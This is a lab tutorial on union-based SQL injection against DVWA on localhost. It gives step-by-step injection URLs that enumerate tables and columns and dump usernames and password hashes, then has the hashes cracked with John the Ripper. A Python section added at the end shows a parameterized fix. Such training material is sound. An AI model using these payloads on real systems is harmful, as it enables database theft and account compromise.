
Union Based Injection using John the Ripper
System used :: Kali Linux
Testing on localhost :: 127.0.0.1/login.php (DVWA)
- Open XAMPP on Linux and start the MySQL and Apache servers
- Open Iceweasel and go to 127.0.0.1/login.php
Log in to the application
Username: admin, Password: password
- Set the security level from 'High' to 'Low' under DVWA Security
- Set up the database under the Setup tab
- Click on SQL injection to begin testing
- Enter 1 in the User ID Field
The request uses the GET method, so the user sees the value in the URL:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
- Check for Exception Handling
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
- Checking using a true condition
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=$' or '1'='1&Submit=Submit#
The above injection reveals the user IDs in the userdb database.
- Checking the number of columns returned by the SQL query
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 5--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
This shows that the number of columns is 2.
- Using 'Union Select' to consolidate the 2 columns
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1, 2--+&Submit=Submit#
- To find the vulnerable columns, make id=-1
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1' union select 1, 2--+&Submit=Submit#
- Check for the version
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1' union select null, version()--+&Submit=Submit#
- To search for the database, version and user
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1' union select concat(database(), ' ', version()), user()--+&Submit=Submit#
- To search for the corresponding table names
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1' union select null, table_name from information_schema.tables --+&Submit=Submit#
- To check for a specific table, for example 'users', in the particular database
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1' union select null, table_name from information_schema.tables where table_name like "users%"--+&Submit=Submit#
This SQL query will display all the tables matching the keyword "users"
- Under the 'users' table, checking for column names
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1' union select null, column_name from information_schema.columns where table_name = "users"--+&Submit=Submit#
- Checking and consolidating all the details of all the columns:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1' union select concat(user_id,' ',first_name,' ',last_name,' ',avatar),concat(user,' ',password) from users--+&Submit=Submit#
- Copy the users & passwords and save them in <user>:<password> format in the "password.txt" file under /Home
- Use the John the Ripper application to crack the passwords, with format md5
Hence we have user names & their corresponding passwords.
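Every result above comes from one root cause: the id parameter is pasted into the SQL text. As an added example (not part of the original tutorial and not DVWA's own code), the following runs four inputs from the steps above against a concatenated query and against an allow-listed, parameterized one. SQLite stands in for MySQL so it runs offline; the query shape, the function names and the sample rows are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows; the table name follows the 'users' table
    # enumerated in the walkthrough. SQLite stands in for MySQL.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "admin"), (2, "Alice", "Example"), (3, "Bob", "Example")])
    return db

def lookup_vulnerable(db, user_id):
    # Assumed shape of the low-security query: the raw parameter is pasted
    # between single quotes, so a quote in user_id ends the string literal.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_hardened(db, user_id):
    # 1. Allow-list: the field is a numeric id, so anything else is rejected.
    if not re.fullmatch(r"[0-9]{1,9}", user_id):
        return []
    # 2. Bound parameter: the value travels separately from the SQL text.
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (int(user_id),)).fetchall()

def run_cases():
    db = make_db()
    # Inputs taken from the steps above, URL-decoded ("+" becomes a space).
    cases = ["1", "1'", "$' or '1'='1", "-1' union select 1, 2-- "]
    results = {}
    for value in cases:
        try:
            vuln = lookup_vulnerable(db, value)
        except sqlite3.Error as exc:
            # The error shown at the exception-handling step: broken syntax.
            vuln = "SQL error: " + type(exc).__name__
        results[value] = (vuln, lookup_hardened(db, value))
    return results

if __name__ == "__main__":
    for value, (vuln, safe) in run_cases().items():
        print(repr(value), "| vulnerable:", vuln, "| hardened:", safe)
```

With the hardened lookup, only the plain numeric id returns a row; the quote, the true condition and the union select all return nothing and raise no database error.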
This tutorial is by Lucideus (Rahul Tyagi). Image quality may not be good, so that the post can load in a reasonable time. Stay tuned for more tutorials.